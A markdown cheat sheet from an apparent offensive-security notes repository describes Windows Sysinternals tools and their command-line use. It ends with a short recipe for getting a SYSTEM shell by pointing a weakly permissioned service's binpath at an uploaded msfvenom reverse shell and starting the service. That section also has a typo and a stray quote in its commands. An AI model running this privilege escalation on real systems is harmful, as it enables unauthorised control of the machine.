killchain-compendium/enumeration/windows/sysinternals.md

4.6 KiB
Raw Blame History

Sysinternals and CLI usage

Opening System Properties

sysdm.cpl

Installing webdav server,

  • Starting windows webclient service
get-service webclient
start-service webclient
  • Opening NetworkAndSharingCenter
control.exe /name Microsoft.NetworkAndSharingCenter

Make sure Network Discovery is enabled, advanced settings!

Install-WindowsFeature WebDAV-Redirector Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table Autosize

Sigcheck

Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a files status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.

  • Check for unsigned files in C:\Windows\system32
sigcheck -u -e C:\Windows\System32
  • -u "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
  • -e "Scan executable images only (regardless of their extension)"

Alternate Data Stream (ADS)

By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)

streams file.txt

notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -stream ads.txt

SDelete

SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.

TCPView

TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.

tcpview
tcpvcon

Autoruns

Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.

Procdump

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.

Procdump

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.

Procmon

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.

Psexec

PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems

Winobj

WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.

BGInfo

It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more

RegJump

This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).

regjump HKLM
  • Similar to
reg query HKLM
Get-Item
Get-ItemProperty

Strings

Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.

Create a system authority shell

  1. Check permissons
accesschk.exe /accepteula -uwcqv user <serviceName>
  1. Query service
sq qc <service>
  1. Set service config to the msfvenom reverse shell, uploaded previously.
sc config daclsvc binpath= "\"C:\shell.exe""
  1. Start service and gain high priv shell
net start daclsvc

Tips & Tricks

\\live.sysinternals.com\tools